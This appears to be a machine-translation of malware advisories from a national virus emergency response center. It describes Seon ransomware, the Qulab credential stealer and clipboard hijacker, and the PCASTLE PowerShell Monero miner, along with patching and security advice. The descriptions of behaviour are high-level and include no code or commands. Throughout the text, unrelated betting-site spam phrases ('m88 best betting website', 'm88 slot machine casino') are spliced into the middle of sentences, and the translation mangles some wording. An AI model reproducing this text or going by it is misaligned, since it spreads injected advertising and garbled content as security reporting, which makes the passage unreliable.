The National Computer Virus Emergency Response Center discovered a ransomware virus called Seon through monitoring the Internet，And the attacker was found to spread through the Bizarro Sundown exploit kit，This exploit kit is often used to spread various ransomware viruses such as GandCrab、Locky、Hermes etc.。Seon ransomware uses AES algorithm to encrypt files，Modify the file suffix to .FIXT，After the encryption is completed, the hta window pops up to interact with the user and ask for ransom。

It will generate the AES key first，Stored in the registry HKEY_CURRENT_USER\Software\GNU\Display -> windowData，Then get CUP information through ASM，Traverse disk，Release ransom message txt files in each directory，Also use the AES algorithm to encrypt files，After encryption is completed, release startb in the Temp directory.bat and run，It is the bat command used to delete disk shadow volumes and backups，Used m88 best betting websiteto m88 slot machine casinoprevent restoring backup，Finally release the readme in the Temp directory.hta file，This file is a ransom message，via mshta.exe popup。

In view of the harm caused by this malicious program，It is recommended that users take safety precautions，Install security software on the computer you are using，And upgrade the virus database version to the latest version，Patch computers to fix vulnerabilities in a timely manner，Includes Internet Explorer memory corruption vulnerability CVE-2016-0189、Flash type confusion vulnerability CVE-2015-7645、Flash out-of-bounds read vulnerability CVE-2016-4117, etc.，To prevent your computer from being harmed by this malicious program。

  Discovered by the National Computer Virus Emergency Response Center through monitoring of the Internet，Recently, a large number of advertising videos about Bitcoin generators have appeared on YouTube，It is claimed that this tool can generate Bitcoin for free for users，In fact, it is a malicious behavior that spreads Qulab information stealing and clipboard hijacking Trojan。

The malicious program pushed in this YouTube scam is the Qulab information stealing and clipboard hijacking Trojan。After program execution，The Trojan will copy itself to %AppData%\amd64_microsoft-windows-netio-infrastructure\msaudite.module.exe this location and start。

Qulab Trojan will steal user browser history、Save browser credentials、cookie，m88 online bettingand m88 bet loginFileZilla、Save to credentials in Discord and Steam。This Trojan also steals from computers.txt、.maFile and.wallet file。

In addition，Qulab can also become a clipboard hijacker，In other words, it can monitor the data appearing in the Windows clipboard，And when data is detected，It can also be exchanged with different data that the attacker wants。In the current attack scenario，Qulab will look for cryptocurrency addresses that have been copied to the clipboard，and swap it out。

Since cryptocurrency addresses are long strings and difficult to memorize verbally，So many users will not notice that the address they recorded has been quietly replaced with something else，An attacker can steal cryptocurrency on a large scale this way。

  The National Computer Virus Emergency Response Center discovered the malicious mining software PCASTLE Zeroes that uses PowerShell to spread malware through monitoring the Internet。The attack first appeared on May 17，To peak on May 22nd，Then enter the stable period。

Further analysis shows this is similar to previous campaigns using obfuscated PowerShell scripts to spread Monero mining malware。From the perspective of victim distribution，The attack does not target a specific industry，Maybe mainly because of the attack method。Using SMB exploits and brute force to crack weak passwords is not an industry-specific security issue。The operators of the attack do not care who the infected users are。

Some new techniques have m88 best betting websitebeen added to this attack。For m88 sports bettingexample，Use multiple propagation methods，Spread cryptocurrency miners using components that perform different tasks。A multi-layered fileless approach is also used to enable a malicious PowerShell script to download and execute the payload in memory。The final PowerShell script is also executed in memory，And packed all malicious paths，Abuse using SMB vulnerability、Brute force system、Use pass-the-hash attack method，and download payload。

At the same time，The attack activity uses XMRig as the mining module of the payload。Compared to other mining algorithm，The Monero mining algorithm does not use many resources，Nor does it require a lot of processing power。In other words, cryptocurrency mining activities can be carried out without users noticing。

In view of the harm caused by this malicious program，It is recommended that users use security mechanisms such as behavior monitoring to detect and prevent abnormal paths and the running of unauthorized programs and scripts，Firewalls and intrusion prevention systems can block malware-related traffic。At the same time，Update and patch the system。The attacker used a patched exploit in this attack。Researchers also recommend using virtual patches or embedded systems。And restrict access to system management tools，Using legitimate tools to bypass detection increases threats。Finally，Perform security reinforcement on the system。Authentication and encryption mechanisms prevent unauthorized m88 online bettingmodifications to the target system，Strengthen m88 best online betting websitethe ability of account credentials to deal with brute force and dictionary attacks。

  In view of the harm caused by this malicious program，It is recommended that users take safety precautions，Install security software on the computer you are using，And upgrade the virus database version to the latest version，Patch computers to fix vulnerabilities in a timely manner，To prevent your computer from being harmed by this malicious program。